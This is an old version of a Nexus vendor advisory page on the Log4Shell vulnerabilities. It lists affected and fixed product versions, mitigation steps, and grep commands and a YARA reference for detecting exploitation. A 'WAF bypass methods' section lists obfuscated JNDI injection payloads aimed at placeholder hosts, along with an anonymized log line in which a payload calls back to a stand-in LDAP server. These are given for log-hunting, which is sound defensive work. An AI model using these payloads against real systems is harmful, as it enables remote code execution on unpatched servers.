Skip to end of metadata
Go to start of metadata

You are viewing an old version of this page. View the current version.

Compare with Current View Page History

« Previous Version 32 Next »

General information

This article contains information related to the remote code execution (RCE) vulnerability affecting Log4j: https://www.randori.com/blog/cve-2021-44228/ 

Log4j2 is an open-source, Java-based logging framework commonly incorporated into Apache web servers. According to public sources, Chen Zhaojun of Alibaba officially reported a Log4j2 remote code execution (RCE) vulnerability to Apache on Nov. 24, 2021.

This critical vulnerability, subsequently tracked as CVE-2021-44228 (aka “Log4Shell”), impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1.

Further on, these additional CVEs was also reported for Log4j, CVE-2021-45046 for the 2.15 version, as well as CVE-2021-45105 for 2.16.

The Nexus Security team has investigated the impact of the Log4j remote code execution vulnerability (CVE-2021-44228), (CVE-2021-45046), (CVE-2021-45105) and the possible impact on our products.

Information about the update

Refer to the table in section "Nexus components" for the latest information for the components.

CVE-2021-45105

There was a new vulnerability (CVE-2021-45105) detected in Log4j, which has been fixed with version Log4j 2.17. Nexus has investigated the issue, and currently we see no indication that Nexus products are affected by this vulnerability.

Customers who still want to update to the latest Log4j version 2.17, can download the corresponding version from the official Log4j website, and replace the version 2.16 JAR file with the new one.

Nexus will update Log4j again with the next regular release of the corresponding product versions.

Releases with fixed versions of the affected components:

  • Smart ID version 21.10.2 This version is packaged with Log4j 2.17.1.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.2

  • Smart ID version 21.10.1 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.10.1

  • Smart ID version 21.04.7 This version is packaged with Log4j 2.17.1.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.7

  • Smart ID version 21.04.6 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 21.04.6

  • Smart ID version 20.11.4 This version is packaged with Log4j 2.17.1.
    You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.4

  • Smart ID version 20.11.3 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID 20.11.3

  • Digital Access version 6.1.2 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, and it is packaged with Log4j 2.17.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.2

  • Digital Access version 6.1.1 This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Digital Access component 6.1.1

  • Smart ID Identity Manager (PRIME) version 3.12.14 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.12.14

  • Smart ID Identity Manager (PRIME) version 3.11.5 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.11.5

  • Smart ID Identity Manager (PRIME) version 3.10.32 This version is packaged with Log4j 2.17.1.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.32

  • Smart ID Identity Manager (PRIME) version 3.10.30 – This version contains a fix for both CVE-2021-44228 and CVE-2021-45046, as it is packaged with Log4j 2.16.
    You can find this version on the support portal, and release notes here: Release note Smart ID Identity Manager 3.10.30

Nexus SaaS customers

If you are a Nexus SaaS (Software as a Service) customer, the mitigation and patching is performed by the SaaS delivery team. Our SaaS services are monitored 24/7/365 by our on-call rotation, and we have also updated our monitoring and routines to deal with this specific CVE. 

Nexus components

This list contains the components from Nexus, and their respective affected versions.

Component

Affected versions

Comment

Smart ID Certificate Manager

None of the supported versions are affected

Does not use Log4j

Nexus OCSP Responder

None of the supported versions are affected

Does not use Log4j

Nexus Timestamp Server

None of the supported versions are affected

Does not use Log4j

Smart ID Desktop / Mobile App

None of the supported versions are affected

Does not use Log4j

Nexus Card SDK

None of the supported versions are affected

Does not use Log4j

Smart ID Physical Access

None of the supported versions are affected

Does not use Log4j

Smart ID Digital Access (previously named Hybrid Access Gateway – HAG)

Versions => 6.0.5 and later could be affected if customers have configured Digital Access to use a syslog server for logging.

When using syslog, Digital Access uses Log4j logging. We are still investigating this, as we have yet not been able to reproduce a successful attack.

For all other purposes, an internal logging framework is used. This framework is not affected by CVE-2021-44228.

  • Fix version 6.1.2 (Digital Access), released 2021-12-22
  • Fix version 6.1.1 (Digital Access), released 2021-12-16

Versions < 6.0.5 are not affected

All versions of HAG are not affected

Recommendation is to implement mitigation as described below, or upgrade to 6.1.1.

Smart ID Identity Manager / PRIME

EOL WAR versions:

3.5
3.6

Supported WAR versions:

3.7
3.8
3.9
3.10
3.11
3.12

Supported Docker versions:

20.06
20.11
21.04
21.10

  • Fix version 21.10.2 (Smart ID), released 2022-01-21
  • Fix version 21.10.1 (Smart ID), released 2021-12-16
  • Fix version 21.04.7 (Smart ID), released 2022-01-21
  • Fix version 21.04.6 (Smart ID), released 2021-12-16
  • Fix version 20.11.4 (Smart ID), released 2022-03-04
  • Fix version 20.11.3 (Smart ID), released 2021-12-17

  • Fix version 3.12.14 (PRIME), released 2021-12-17
  • Fix version 3.11.5 (PRIME), released 2021-12-17
  • Fix version 3.10.32 (PRIME), released 2022-03-04
  • Fix version 3.10.30 (PRIME), released 2021-12-16

Recommendation is to implement mitigation as described below, or upgrade.

Smart ID Self-Service

Supported WAR versions:

3.9
3.10
3.11
3.12

Supported Docker versions:

20.06
20.11
21.04
21.10

Recommendation is to implement mitigation as described below, until Nexus has provided an official fix

Smart ID Messaging component - Hermod

None of the supported versions are affected

Hermod is shipped with Log4j framework, in this case log4j-api, which is not affected. Hermod uses logback for its logging, and not Log4j. See reference in documentation: Link and: Link

Customers who are still using the older WAR versions of Hermod, could have configured Log4j on their own. Please be aware of this and double-check your configuration.

If you have made any customized adaptations of your own logging, you need to investigate this with your teams internally. The information in this list is based on how Nexus ship our released versions to you.

Mitigation

Patch using the latest available version from Nexus, as specified above.

For temporary mitigations, we recommend that you refer to Apaches public documentation for each specific CVE: https://logging.apache.org/log4j/2.x/security.html

Further information

As an additional recommendation, we highly encourage you to investigate all other application servers (non Nexus software) you might have, that could use Log4j.

We also encourage you to perform log analysis of your application and network traffic and to take appropriate steps for mitigation.

This list contains some of the known applications that could be vulnerable to this CVE:

  • Apache Struts
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • ElasticSearch
  • Flume
  • Apache Dubbo
  • Logstash
  • Kafka
  • Spring-Boot-starter-log4j2

Log4j RCE exploitation detection

You can use these commands and rules to search for exploitation attempts against Log4j RCE vulnerability CVE-2021-44228.

The below commands are examples, and you will need to point the commands to your respective application log folder.

Nexus does not have access to the systems hosted by you, the customer, (except for Nexus SaaS Services, where this is handled by the service organization) and it is vital that you perform investigations of your own to make sure that you have not been breached and is subject to any form of data breach.

Grep / Zgrep

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'

Grep / Zgrep - Obfuscated variants

These commands cover even the obfuscated variants but lack the file name in a match. 

This command searches for exploitation attempts in uncompressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -type f -exec sh -c "cat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;

This command searches for exploitation attempts in compressed files in the folder /var/log and all sub folders:

sudo find /var/log/ -name "*.gz" -type f -exec sh -c "zcat {} | sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(l

Yara file

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virus total and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.

On this GitHub page, you can find a YARA file that is tailormade for this CVE (CVE-2021-44228)

Credit for the Grep and Yara files goes to Neo23x0 / Florian Roth. We share these with you, under the Detection Rule license (DRL) 1.1

WAF bypass methods

Many WAF (Web Application Firewall) vendors and providers have implemented WAF rules to be able to stop the traffic before it can reach the application itself.

There are methods to bypass some of the WAF rules, and these are some examples of methods that we would encourage you to search for in your logs, to see if your WAF might not have caught these requests.

Note: asdasd and xxxxxx are only examples, this will be the attackers url in a real scenario.

Example
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}

This is an example of how this could look like in an application log (real request, anonymized):

2021-12-12 05:54:07 0 ip.number.ip.ip 5f7288ab7f41d805 - - - endpoint.ip.number:443 https - GET / ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://111.111.1111.111:12344/Basic/Command/
Base64/V2Ugd291bGQgbm90IHBvc3QgYW55dGhpbmcgbWFsaWNpb3VzIGhlcmUsIHNvIHRoaXMgaXMganVzdCBh
biBleGFtcGxlIHRleHQgY29udmVydGVkIHRvIEJBU0U2NCA6KQ== } host:ip.number.ip.ip:443 404

Disclaimer

Nexus has made effort to make this information accurate and reliable. However, the information, including the recommendations provided by Nexus, is provided "as is" without warranty of any kind. Nexus disclaims all warranties, either expressed or implied and Nexus shall in no event be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, which may arise as a result of your use, or inability to use, this information.

Latest update date of this article

2022-03-04


Table of contents


  • No labels